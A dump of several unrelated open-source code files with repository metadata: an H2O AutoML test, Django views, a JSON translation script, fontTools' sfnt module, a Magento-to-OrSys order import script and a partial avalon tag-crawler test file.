"size": "8031",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "zerver/actions/custom_profile_fields.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "490256"
},
{
"name": "Dockerfile",
"bytes": "4025"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "749848"
},
{
"name": "Handlebars",
"bytes": "377098"
},
{
"name": "JavaScript",
"bytes": "4006373"
},
{
"name": "Perl",
"bytes": "10163"
},
{
"name": "Puppet",
"bytes": "112128"
},
{
"name": "Python",
"bytes": "10168530"
},
{
"name": "Ruby",
"bytes": "3459"
},
{
"name": "Shell",
"bytes": "146797"
},
{
"name": "TypeScript",
"bytes": "284837"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import os
import sys
import tempfile
import time
sys.path.insert(1, os.path.join("..","..",".."))
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset
def automl_mojo():
    """Train a tiny AutoML run (2 models) and verify that the leader
    model's MOJO artifact can be downloaded to disk."""
    ds = import_dataset()
    aml = H2OAutoML(max_models=2, project_name="py_lb_test_aml1", seed=1234)
    aml.train(y=ds.target, training_frame=ds.train)
    # download mojo
    model_zip_path = os.path.join(tempfile.mkdtemp(), 'model.zip')
    time0 = time.time()
    print("\nDownloading MOJO @... " + model_zip_path)
    mojo_file = aml.download_mojo(model_zip_path)
    print("    => %s  (%d bytes)" % (mojo_file, os.stat(mojo_file).st_size))
    assert os.path.exists(mojo_file)
    print("    Time taken = %.3fs" % (time.time() - time0))
    assert os.path.isfile(model_zip_path)
    # Clean up the downloaded artifact.
    os.remove(model_zip_path)
# Register the check with the pyunit test runner.
pu.run_tests([
    automl_mojo
])
|
{
"content_hash": "91b58cfc7e88073a5b1e0ae8700a29d1",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 76,
"avg_line_length": 28.03030303030303,
"alnum_prop": 0.6572972972972972,
"repo_name": "h2oai/h2o-3",
"id": "d7b6b2032e5fd5cf1bb957ce19c2be2ccf17fe17",
"size": "925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_algos/automl/pyunit_automl_mojo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "12803"
},
{
"name": "CSS",
"bytes": "882321"
},
{
"name": "CoffeeScript",
"bytes": "7550"
},
{
"name": "DIGITAL Command Language",
"bytes": "106"
},
{
"name": "Dockerfile",
"bytes": "10459"
},
{
"name": "Emacs Lisp",
"bytes": "2226"
},
{
"name": "Groovy",
"bytes": "205646"
},
{
"name": "HCL",
"bytes": "36232"
},
{
"name": "HTML",
"bytes": "8018117"
},
{
"name": "HiveQL",
"bytes": "3985"
},
{
"name": "Java",
"bytes": "15981357"
},
{
"name": "JavaScript",
"bytes": "148426"
},
{
"name": "Jupyter Notebook",
"bytes": "20638329"
},
{
"name": "Makefile",
"bytes": "46043"
},
{
"name": "PHP",
"bytes": "800"
},
{
"name": "Python",
"bytes": "8188608"
},
{
"name": "R",
"bytes": "4149977"
},
{
"name": "Ruby",
"bytes": "64"
},
{
"name": "Sass",
"bytes": "23790"
},
{
"name": "Scala",
"bytes": "4845"
},
{
"name": "Shell",
"bytes": "214495"
},
{
"name": "Smarty",
"bytes": "1792"
},
{
"name": "TeX",
"bytes": "554940"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.core.urlresolvers import reverse
from cosinnus.views.profile import UserProfileUpdateView
from cosinnus.views.user import UserListView
class BusListView(UserListView):
    """User list restricted to people whose profile says they have a bus."""

    template_name = 'ecobasa/bus_list.html'

    def get_context_data(self, **kwargs):
        context = super(BusListView, self).get_context_data(**kwargs)
        all_users = context['user_list']
        context['user_list'] = all_users.filter(cosinnus_profile__has_bus=True)
        return context


bus_list = BusListView.as_view()
# Reuses the profile-update form to let a user register their bus.
class BusAddView(UserProfileUpdateView):
    template_name = 'ecobasa/bus_add.html'
    def get_success_url(self):
        # After a successful save, return to the bus list.
        return reverse('bus-list')
bus_add = BusAddView.as_view()
|
{
"content_hash": "4144c5b5425dbf080dab62f43fc7e36a",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 90,
"avg_line_length": 27.46153846153846,
"alnum_prop": 0.7240896358543417,
"repo_name": "ecobasa/ecobasa",
"id": "5a6b1297e87c1372acd4e30df566771a7b492793",
"size": "738",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ecobasa/views/bus.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10161"
},
{
"name": "Dockerfile",
"bytes": "799"
},
{
"name": "HTML",
"bytes": "363806"
},
{
"name": "JavaScript",
"bytes": "24440"
},
{
"name": "Less",
"bytes": "1595"
},
{
"name": "Python",
"bytes": "877232"
},
{
"name": "SCSS",
"bytes": "42435"
}
],
"symlink_target": ""
}
|
import os
import re
import json
import argparse
from os.path import join, isdir
from sys import argv, exit
from urllib2 import HTTPError
from goslate import Goslate
from settings import USE_SSL, GOOGLE_DOMAINS
# Build one Google Translate endpoint URL per configured domain, honoring
# the USE_SSL setting, and create a single shared Goslate client.
service_urls = [('https://' if USE_SSL else 'http://') + 'translate' + domain for domain in GOOGLE_DOMAINS]
gs = Goslate(service_urls=service_urls)
def wrap(string):
    """Wrap '{{...}}' template variables in <span> tags so the translation
    service leaves them alone.

    '{{' becomes '<span>{{' and '}}' becomes '}}</span>'.
    """
    # The markers are literal substrings; str.replace is simpler and
    # equivalent to the regex substitution used previously.
    string = string.replace('{{', '<span>{{')
    string = string.replace('}}', '}}</span>')
    return string
def unwrap(string):
    """Undo wrap(): strip the <span> markers (and the spaces the translation
    inserted around them) to recover the '{{...}}' template variables."""
    # Case-insensitive because the translated HTML may change tag casing.
    opening = re.compile('<span> {{', re.IGNORECASE)
    closing = re.compile('}} </span>', re.IGNORECASE)
    string = string.replace('</ ', '</')
    string = opening.sub('{{', string)
    string = closing.sub('}}', string)
    return string
def translate(string, source, target):
    """Translate string from the source to the target language via Goslate,
    returning UTF-8 encoded bytes.

    Exits with a helpful message on HTTP 404 (bad translate domain);
    re-raises any other HTTP error.
    """
    try:
        return gs.translate(string, target, source).encode('utf-8')
    except HTTPError, err:
        if err.code == 404:
            exit('Bad Google Translate Domain: {0}'.format(err.url))
        raise err
def translate_all(strings):
    """Recursively translate every leaf string of the (possibly nested)
    strings dict in place.

    '{{...}}' template variables are protected through the translation by
    wrap()/unwrap() and then restored verbatim from the original string.
    """
    for string in strings:
        # isinstance is the idiomatic type check (the original compared
        # type(...) == type(dict())).
        if isinstance(strings[string], dict):
            translate_all(strings[string])
        else:
            original_string = wrap(strings[string])
            translated_string = unwrap(translate(original_string, source_language, target_language))
            original_variables = re.findall('{{.*}}', original_string)
            translated_variables = re.findall('{{.*}}', translated_string)
            if len(original_variables) > 0:
                # Restore each (possibly mangled) translated variable from
                # the matching original.
                for i, var in enumerate(original_variables):
                    translated_string = translated_string.replace(translated_variables[i], str(var))
            strings[string] = translated_string
if __name__ == '__main__':
    # Command line: linguist.py [-i INPUT_DIR] [-o OUTPUT_DIR] SOURCE TARGET
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', help='input help')
    parser.add_argument('-o', '--output', help='output help')
    parser.add_argument('source_language', type=str)
    parser.add_argument('target_language', type=str)
    args = parser.parse_args();
    # Both directories default to ./i18n when not supplied.
    input_dir = args.input if args.input is not None else 'i18n'
    output_dir = args.output if args.output is not None else 'i18n'
    source_language = args.source_language.lower()
    target_language = args.target_language.lower()
    # Validate both languages against Goslate's supported set.
    supported = [x.lower() for x in gs.get_languages().keys()]
    if source_language not in supported:
        exit('{0} not supported.'.format(source_language))
    if target_language not in supported:
        exit('{0} not supported.'.format(target_language))
    source_dir = join(input_dir, source_language)
    target_dir = join(output_dir, target_language)
    # Translate every JSON strings file under the source language directory,
    # writing the translated copy under the target language directory.
    for root, dirs, files in os.walk(source_dir):
        for filename in files:
            filepath = join(root, filename)
            outpath = join(target_dir, filename)
            if not isdir(target_dir):
                os.mkdir(target_dir)
            with open(filepath, 'r') as f:
                strings = json.load(f, 'utf-8')
            translate_all(strings)
            with open(outpath, 'w+') as f:
                json.dump(strings, f, indent=4, separators=(',', ': '), ensure_ascii=False)
|
{
"content_hash": "9a269b1649ecf38fa964781f44421372",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 107,
"avg_line_length": 32.27450980392157,
"alnum_prop": 0.6215066828675577,
"repo_name": "maxdeviant/linguist",
"id": "81a82f951a33b0f356ba7210014074c45b84b4b7",
"size": "3292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "linguist.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7285"
}
],
"symlink_target": ""
}
|
"""ttLib/sfnt.py -- low-level module to deal with the sfnt file format.
Defines two public classes:
SFNTReader
SFNTWriter
(Normally you don't have to use these classes explicitly; they are
used automatically by ttLib.TTFont.)
The reading and writing of sfnt files is separated in two distinct
classes, since whenever to number of tables changes or whenever
a table's length chages you need to rewrite the whole file anyway.
"""
import sys
import struct, sstruct
import numpy
import os
class SFNTReader:
def __init__(self, file, checkChecksums=1, fontNumber=-1):
self.file = file
self.checkChecksums = checkChecksums
data = self.file.read(sfntDirectorySize)
if len(data) <> sfntDirectorySize:
from fontTools import ttLib
raise ttLib.TTLibError, "Not a TrueType or OpenType font (not enough data)"
sstruct.unpack(sfntDirectoryFormat, data, self)
if self.sfntVersion == "ttcf":
assert ttcHeaderSize == sfntDirectorySize
sstruct.unpack(ttcHeaderFormat, data, self)
assert self.Version == 0x00010000 or self.Version == 0x00020000, "unrecognized TTC version 0x%08x" % self.Version
if not 0 <= fontNumber < self.numFonts:
from fontTools import ttLib
raise ttLib.TTLibError, "specify a font number between 0 and %d (inclusive)" % (self.numFonts - 1)
offsetTable = struct.unpack(">%dL" % self.numFonts, self.file.read(self.numFonts * 4))
if self.Version == 0x00020000:
pass # ignoring version 2.0 signatures
self.file.seek(offsetTable[fontNumber])
data = self.file.read(sfntDirectorySize)
sstruct.unpack(sfntDirectoryFormat, data, self)
if self.sfntVersion not in ("\000\001\000\000", "OTTO", "true"):
from fontTools import ttLib
raise ttLib.TTLibError, "Not a TrueType or OpenType font (bad sfntVersion)"
self.tables = {}
for i in range(self.numTables):
entry = SFNTDirectoryEntry()
entry.fromFile(self.file)
if entry.length > 0:
self.tables[entry.tag] = entry
else:
# Ignore zero-length tables. This doesn't seem to be documented,
# yet it's apparently how the Windows TT rasterizer behaves.
# Besides, at least one font has been sighted which actually
# *has* a zero-length table.
pass
def has_key(self, tag):
return self.tables.has_key(tag)
def keys(self):
return self.tables.keys()
def __getitem__(self, tag):
"""Fetch the raw table data."""
entry = self.tables[tag]
self.file.seek(entry.offset)
data = self.file.read(entry.length)
if self.checkChecksums:
if tag == 'head':
# Beh: we have to special-case the 'head' table.
checksum = calcChecksum(data[:8] + '\0\0\0\0' + data[12:])
else:
checksum = calcChecksum(data)
if self.checkChecksums > 1:
# Be obnoxious, and barf when it's wrong
assert checksum == entry.checksum, "bad checksum for '%s' table" % tag
elif checksum <> entry.checkSum:
# Be friendly, and just print a warning.
print "bad checksum for '%s' table" % tag
return data
def __delitem__(self, tag):
del self.tables[tag]
def close(self):
self.file.close()
class SFNTWriter:
	def __init__(self, file, numTables, sfntVersion="\000\001\000\000"):
		# Precompute the binary-search fields the sfnt directory requires,
		# then reserve space for the directory so table data can be written
		# sequentially after it.
		self.file = file
		self.numTables = numTables
		self.sfntVersion = sfntVersion
		self.searchRange, self.entrySelector, self.rangeShift = getSearchRange(numTables)
		self.nextTableOffset = sfntDirectorySize + numTables * sfntDirectoryEntrySize
		# clear out directory area
		self.file.seek(self.nextTableOffset)
		# make sure we're actually where we want to be. (XXX old cStringIO bug)
		self.file.write('\0' * (self.nextTableOffset - self.file.tell()))
		self.tables = {}
def __setitem__(self, tag, data):
"""Write raw table data to disk."""
if self.tables.has_key(tag):
# We've written this table to file before. If the length
# of the data is still the same, we allow overwriting it.
entry = self.tables[tag]
if len(data) <> entry.length:
from fontTools import ttLib
raise ttLib.TTLibError, "cannot rewrite '%s' table: length does not match directory entry" % tag
else:
entry = SFNTDirectoryEntry()
entry.tag = tag
entry.offset = self.nextTableOffset
entry.length = len(data)
self.nextTableOffset = self.nextTableOffset + ((len(data) + 3) & ~3)
self.file.seek(entry.offset)
self.file.write(data)
# Add NUL bytes to pad the table data to a 4-byte boundary.
# Don't depend on f.seek() as we need to add the padding even if no
# subsequent write follows (seek is lazy), ie. after the final table
# in the font.
self.file.write('\0' * (self.nextTableOffset - self.file.tell()))
assert self.nextTableOffset == self.file.tell()
if tag == 'head':
entry.checkSum = calcChecksum(data[:8] + '\0\0\0\0' + data[12:])
else:
entry.checkSum = calcChecksum(data)
self.tables[tag] = entry
def close(self):
"""All tables must have been written to disk. Now write the
directory.
"""
tables = self.tables.items()
tables.sort()
if len(tables) <> self.numTables:
from fontTools import ttLib
raise ttLib.TTLibError, "wrong number of tables; expected %d, found %d" % (self.numTables, len(tables))
directory = sstruct.pack(sfntDirectoryFormat, self)
self.file.seek(sfntDirectorySize)
seenHead = 0
for tag, entry in tables:
if tag == "head":
seenHead = 1
directory = directory + entry.toString()
if seenHead:
self.calcMasterChecksum(directory)
self.file.seek(0)
self.file.write(directory)
def calcMasterChecksum(self, directory):
# calculate checkSumAdjustment
tags = self.tables.keys()
checksums = numpy.zeros(len(tags)+1, numpy.uint32)
for i in range(len(tags)):
checksums[i] = self.tables[tags[i]].checkSum
directory_end = sfntDirectorySize + len(self.tables) * sfntDirectoryEntrySize
assert directory_end == len(directory)
checksums[-1] = calcChecksum(directory)
checksum = numpy.add.reduce(checksums,dtype=numpy.uint32)
# BiboAfba!
checksumadjustment = int(numpy.subtract.reduce(numpy.array([0xB1B0AFBA, checksum], numpy.uint32)))
# write the checksum to the file
self.file.seek(self.tables['head'].offset + 8)
self.file.write(struct.pack(">L", checksumadjustment))
# -- sfnt directory helpers and cruft

# Header of a TrueType Collection (.ttc) file; the per-font offset table
# and the optional DSIG fields follow it on disk and are read separately.
ttcHeaderFormat = """
> # big endian
TTCTag: 4s # "ttcf"
Version: L # 0x00010000 or 0x00020000
numFonts: L # number of fonts
# OffsetTable[numFonts]: L # array with offsets from beginning of file
# ulDsigTag: L # version 2.0 only
# ulDsigLength: L # version 2.0 only
# ulDsigOffset: L # version 2.0 only
"""

ttcHeaderSize = sstruct.calcsize(ttcHeaderFormat)

# The sfnt header proper: version plus the binary-search helper fields
# required by the spec (searchRange/entrySelector/rangeShift).
sfntDirectoryFormat = """
> # big endian
sfntVersion: 4s
numTables: H # number of tables
searchRange: H # (max2 <= numTables)*16
entrySelector: H # log2(max2 <= numTables)
rangeShift: H # numTables*16-searchRange
"""

sfntDirectorySize = sstruct.calcsize(sfntDirectoryFormat)

# One 16-byte entry of the table directory.
sfntDirectoryEntryFormat = """
> # big endian
tag: 4s
checkSum: L
offset: L
length: L
"""

sfntDirectoryEntrySize = sstruct.calcsize(sfntDirectoryEntryFormat)
class SFNTDirectoryEntry:
    """One sfnt table-directory entry: tag, checkSum, offset, length."""

    def fromFile(self, file):
        # Populate this entry from the next sfntDirectoryEntrySize bytes
        # of an open font file.
        sstruct.unpack(sfntDirectoryEntryFormat,
                file.read(sfntDirectoryEntrySize), self)

    def fromString(self, str):
        # NOTE(review): the parameter name shadows the builtin 'str';
        # kept as-is for interface compatibility.
        sstruct.unpack(sfntDirectoryEntryFormat, str, self)

    def toString(self):
        # Serialize back to the 16-byte on-disk representation.
        return sstruct.pack(sfntDirectoryEntryFormat, self)

    def __repr__(self):
        # A fresh entry has no 'tag' until fromFile/fromString runs.
        if hasattr(self, "tag"):
            return "<SFNTDirectoryEntry '%s' at %x>" % (self.tag, id(self))
        else:
            return "<SFNTDirectoryEntry at %x>" % id(self)
def calcChecksum(data, start=0):
    """Calculate the checksum for an arbitrary block of data.
    Optionally takes a 'start' argument, which allows you to
    calculate a checksum in chunks by feeding it a previous
    result.

    If the data length is not a multiple of four, it assumes
    it is to be padded with null byte.
    """
    # (removed an unused 'from fontTools import ttLib' import)
    remainder = len(data) % 4
    if remainder:
        # Pad to a 4-byte boundary: sfnt checksums are defined over
        # big-endian 32-bit words.
        data = data + '\0' * (4 - remainder)
    # Floor division keeps the count an int (identical result in py2).
    longs = struct.unpack(">%dL" % (len(data) // 4), data)
    a = numpy.array((start,) + longs, numpy.uint32)
    # uint32 arithmetic wraps modulo 2**32, as the sfnt spec requires.
    return int(numpy.sum(a, dtype=numpy.uint32))
def maxPowerOfTwo(x):
    """Return the highest exponent of two, so that
    (2 ** exponent) <= x
    """
    # Shift right until a single leading bit remains; the number of
    # shifts is floor(log2(x)).  For x <= 1 the answer is 0.
    exponent = 0
    while x > 1:
        x = x >> 1
        exponent = exponent + 1
    return exponent
def getSearchRange(n):
    """Calculate searchRange, entrySelector, rangeShift for the
    sfnt directory. 'n' is the number of tables.

    These three redundant values are stored in the sfnt header to let
    rasterizers binary-search the table directory.
    """
    # (removed an unused 'import math')
    exponent = maxPowerOfTwo(n)
    searchRange = (2 ** exponent) * 16
    entrySelector = exponent
    rangeShift = n * 16 - searchRange
    return searchRange, entrySelector, rangeShift
|
{
"content_hash": "01af67ad14d9e4da6056064ffd20f89a",
"timestamp": "",
"source": "github",
"line_count": 273,
"max_line_length": 116,
"avg_line_length": 32.26007326007326,
"alnum_prop": 0.693539230157829,
"repo_name": "shadowmint/nwidget",
"id": "6019d5fad561370f7541a01e7769102bd218649d",
"size": "8807",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/fonttools-2.3/Lib/fontTools/ttLib/sfnt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11298"
},
{
"name": "JavaScript",
"bytes": "17394"
},
{
"name": "PHP",
"bytes": "2190"
},
{
"name": "Python",
"bytes": "9815941"
},
{
"name": "Shell",
"bytes": "10521"
}
],
"symlink_target": ""
}
|
import os
import sys

if __name__ == "__main__":
    # Standard Django entry point: default to the project-local settings
    # module, then dispatch to the management command given on argv.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
|
{
"content_hash": "2e4bb297f3cf59c5c2eeb645a6ff43ba",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 64,
"avg_line_length": 27.375,
"alnum_prop": 0.7077625570776256,
"repo_name": "stephrdev/brigitte",
"id": "448a7a7ac3b402010447eff4b06fc0456f49f5c9",
"size": "241",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "brigitte_site/manage.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10097"
},
{
"name": "Python",
"bytes": "162658"
}
],
"symlink_target": ""
}
|
import MySQLdb
import logging
import datetime
from settings import db_password, db_name, MdbUser, MdbPassword, Mdb, MdbIP
from functions import getPhoneID, getFaxID, getAddressID
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
# logger = logging.getLogger(__name__)
def check_new_orders(lastOid):
    """Return True when Magento holds an order newer than lastOid."""
    connection = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
    cursor = connection.cursor()
    cursor.execute(
        """SELECT entity_id FROM sales_flat_order ORDER BY created_at DESC
        LIMIT 1""")
    newest_magento_id = int(cursor.fetchone()[0])
    connection.commit()
    connection.close()
    return newest_magento_id > lastOid
def getLastOid():
    """Return the Magento id of the newest order already registered in OrSys."""
    connection = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
    cursor = connection.cursor()
    cursor.execute(
        """SELECT magento_id FROM orders ORDER BY magento_time DESC LIMIT 1""")
    last_registered = int(cursor.fetchone()[0])
    connection.commit()
    connection.close()
    return last_registered
def getFreshOrderDataSet(o_id):
    """Fetch one order's header data and its line items from Magento.

    Returns (o_Data, productsDataSet): o_Data is a dict with customer,
    address, and timestamp fields; productsDataSet is a sequence of
    (sku, qty_ordered, price, name) rows.
    """
    # (removed a redundant per-call logging.basicConfig -- the module
    # already configures logging at import time)
    db = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
    MySQL_c = db.cursor()
    MySQL_c.execute(
        """SELECT customer_firstname, customer_lastname, customer_email,
        shipping_address_id, billing_address_id, created_at
        FROM sales_flat_order WHERE entity_id=%s""", (o_id,))
    (customer_firstname, customer_lastname, customer_email,
     shipping_address_id, billing_address_id, mag_time) = MySQL_c.fetchone()
    sh_address = getAddress(shipping_address_id)
    b_address = getAddress(billing_address_id)
    try:
        cName = customer_firstname + ' ' + customer_lastname
    except TypeError:
        # Either name component is NULL (None) in Magento.
        cName = 'corrupted'
        logging.debug('This is corrupted customer name in %s', o_id)
    o_Data = {
        'cName': cName,
        'cEmail': customer_email, 'shAddress': sh_address,
        'bAddress': b_address, 'magTime': mag_time, 'mID': o_id
    }
    # BUG FIX: execute() parameters must be a sequence -- '(o_id)' is
    # just a parenthesized scalar; '(o_id,)' is the required 1-tuple.
    MySQL_c.execute(
        """SELECT sku, qty_ordered, price, name FROM sales_flat_order_item
        WHERE order_id=%s""", (o_id,))
    productsDataSet = MySQL_c.fetchall()
    db.commit()
    db.close()
    return o_Data, productsDataSet
def getAddress(aID):
    """Retrieve address attributes from remote Magento DB"""
    connection = MySQLdb.connect(host=MdbIP, user=MdbUser, passwd=MdbPassword, db=Mdb)
    cursor = connection.cursor()
    cursor.execute(
        """SELECT region, postcode, firstname, lastname, street, city, email,
        telephone, fax FROM sales_flat_order_address WHERE entity_id=%s""",
        (aID,))
    row = cursor.fetchone()
    connection.commit()
    connection.close()
    # Keys follow the SELECT column order exactly.
    field_names = ('region', 'postcode', 'firstname', 'lastname', 'street',
                   'city', 'email', 'telephone', 'fax')
    return dict(zip(field_names, row))
def insertOrder(o_Data):
    """Accordingly with the definition :-)"""
    # Registers a detected Magento order in the local OrSys DB and
    # returns the new OrSys order id.  The shipping address doubles as
    # the customer's billing address (see getCustomerID).
    db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
    MySQL_c = db.cursor()
    rTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    shippingAddress = o_Data['shAddress']
    (province, ZIP,
     firstname, lastname,
     street, city,
     email, telephone,
     fax) = (
        shippingAddress['region'], shippingAddress['postcode'],
        shippingAddress['firstname'], shippingAddress['lastname'],
        shippingAddress['street'], shippingAddress['city'],
        shippingAddress['email'], shippingAddress['telephone'],
        shippingAddress['fax']
    )
    country = 'Australia'  # it is a tap
    # Resolve (or create) the normalized address/phone/customer rows.
    shAid = getAddressID(street, city, province, ZIP, country, 1)
    shPhid = getPhoneID(telephone, 1)
    c_id = getCustomerID(firstname, lastname, email, shPhid, shAid)
    # New orders start in the 'revocated' status.
    prepData = (
        o_Data['mID'], c_id, shAid, shPhid,
        o_Data['magTime'], rTime, 'revocated')
    MySQL_c.execute(
        """INSERT INTO orders (magento_id, customer_id, shipping_address_id,
        shipping_phone_id, magento_time, orsys_reg_time, status) VALUES(%s, %s,
        %s, %s, %s, %s, %s)""", prepData)
    o_id = MySQL_c.lastrowid
    db.commit()
    db.close()
    return o_id
def getCustomerID(firstName, lastName, email, shPhid, shAid):
    """Return the OrSys customer id, creating the customer row if needed.

    For simplification purposes the shipping address is also stored as
    the billing address.
    """
    try:
        cName = firstName + ' ' + lastName
    except TypeError:
        # A name component is NULL (None); fall back to a marker value.
        # BUG FIX: the old message referenced an undefined local 'o_id',
        # which raised NameError whenever this branch was taken.
        cName = 'corrupted'
        logging.debug('Corrupted customer name for email %s', email)
    db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
    MySQL_c = db.cursor()
    MySQL_c.execute(
        """SELECT id from customers WHERE customer_name=%s AND email=%s""",
        (cName, email))
    try:
        cID = MySQL_c.fetchone()[0]
    except TypeError:
        # fetchone() returned None -> no such customer yet; create it.
        # (Narrowed from a bare 'except:' which hid real DB errors.)
        MySQL_c.execute(
            """INSERT INTO customers (customer_name, email, phone_num_id,
            billing_address_id, shipping_address_id)
            VALUES(%s, %s, %s, %s, %s)""",
            (cName, email, shPhid, shAid, shAid))
        cID = MySQL_c.lastrowid
    db.commit()
    db.close()
    return cID
def processOrder(o_id, p_Data):
    """Order products data insertion into OrSys DB"""
    # Inserts one order_composition row per ordered product, resolving
    # each product's OrSys id (creating it on first sight) via
    # getProductID().  Always returns True.
    db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
    MySQL_c = db.cursor()
    for i in p_Data:
        # Each row comes straight from Magento's sales_flat_order_item.
        sku, qty_ordered, price, name = i
        pID = getProductID(sku, name)
        MySQL_c.execute(
            """INSERT INTO order_composition (order_id, product_id, price,
            qty) VALUES(%s, %s, %s, %s)""", (o_id, pID, price,
                                             qty_ordered))
    db.commit()
    db.close()
    return True
def getProductID(sku, name):
    """Return the OrSys product id for 'sku', creating the product if new.

    Logs a debug message when the stored product name differs from the
    incoming Magento name (a "synonym").
    """
    # (removed a redundant per-call logging.basicConfig -- the module
    # already configures logging at import time)
    db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
    MySQL_c = db.cursor()
    MySQL_c.execute(
        """SELECT id FROM products WHERE sku=%s""", (sku,))
    try:
        pID = MySQL_c.fetchone()[0]
        # synonym detection:
        MySQL_c.execute(
            """SELECT item_name FROM products WHERE id=%s""", (pID,))
        itemName = MySQL_c.fetchone()[0]
        if name != itemName:
            msg = "Synonym detecded. Product with id %s have an old \
name: %s and a new one: %s" % (pID, itemName, name)
            logging.debug(msg)
    except TypeError:
        # fetchone() returned None -> unknown SKU; register the product.
        # (Narrowed from a bare 'except:' which hid real DB errors.)
        MySQL_c.execute(
            """INSERT INTO products (item_name, sku) VALUES(%s, %s)""",
            (name, sku))
        pID = MySQL_c.lastrowid
    db.commit()
    db.close()
    return pID
# Detector itself:
# Walk forward from the newest order already registered in OrSys and pull
# each newer order out of Magento one entity_id at a time (assumes Magento
# entity_ids are contiguous -- a gap would stall the loop).
lastOid = int(getLastOid()) + 1
# NOTE(review): check_new_orders() tests 'newest > lastOid'; since lastOid
# is already incremented here, the very newest order is skipped until a
# later one appears -- looks like it may need '>='; confirm intent.
while check_new_orders(lastOid):  # there is (are) new orders there
    logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
    oData, pDataSet = getFreshOrderDataSet(lastOid)
    newOID = insertOrder(oData)
    logging.debug("New order No %s was detected." % (newOID,))
    processOrder(newOID, pDataSet)
    lastOid = lastOid + 1
|
{
"content_hash": "e9261076086bc4fed894cf976e09a9a3",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 79,
"avg_line_length": 35.90865384615385,
"alnum_prop": 0.6209666622037756,
"repo_name": "0--key/lib",
"id": "b901031bd027183f096435e1372ae9185be90a1d",
"size": "7469",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "portfolio/2013_OrSys/detector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "28210"
},
{
"name": "Emacs Lisp",
"bytes": "76390"
},
{
"name": "HTML",
"bytes": "1136671"
},
{
"name": "JavaScript",
"bytes": "27718"
},
{
"name": "PHP",
"bytes": "378537"
},
{
"name": "Python",
"bytes": "1892998"
},
{
"name": "Shell",
"bytes": "4030"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import mock
import avalon.log
import avalon.tags.read
import avalon.tags.crawl
class DummyWalk(object):
    """Stand-in for os.walk that yields a single, fixed file listing."""

    def __init__(self, files):
        # Filenames to report for whatever root the caller passes in.
        self._files = files

    def __call__(self, root, *args, **kwargs):
        # Mimic exactly one os.walk step: (dirpath, dirnames, filenames).
        step = (root, '', self._files)
        yield step
class TestTagCrawler(object):
    """Tests for avalon.tags.crawl.TagCrawler error handling.

    Each test stubs the metadata loader so that tag loading either fails
    (IOError/ValueError, with and without non-ASCII text in the message)
    or succeeds, and asserts how many tag results the crawler yields.
    """

    def test_get_tags_io_error(self):
        """Test that exceptions when loading tags are dealt with quietly"""
        loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
        files = ['path.ogg', 'path2.ogg']
        # One IOError per file: both must be swallowed by the crawler.
        loader.get_from_path.side_effect = [IOError("OH NOES"), IOError("OH NOES")]
        crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
        out = crawler.get_tags()
        assert 0 == len(out)

    def test_get_tags_io_error_unicode_error_message(self):
        """Test that exceptions when loading tags are dealt with quietly and \
        unicode characters in error messages don't cause encoding issues.
        """
        loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
        files = ['path.ogg', 'path2.ogg']
        loader.get_from_path.side_effect = [IOError('OH NOES! Verás'), IOError('OH NOES! Verás')]
        crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
        out = crawler.get_tags()
        assert 0 == len(out)

    def test_get_tags_value_error(self):
        """ Test that exceptions when parsing tags are dealt with quietly"""
        loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
        files = ['path.ogg', 'path2.ogg']
        loader.get_from_path.side_effect = [ValueError("OH NOES"), ValueError("OH NOES")]
        crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
        out = crawler.get_tags()
        assert 0 == len(out)

    def test_get_tags_value_error_unicode_error_message(self):
        """ Test that exceptions when parsing tags are dealt with quietly and \
        unicode characters in error messages don't cause encoding issues.
        """
        loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
        files = ['path.ogg', 'path2.ogg']
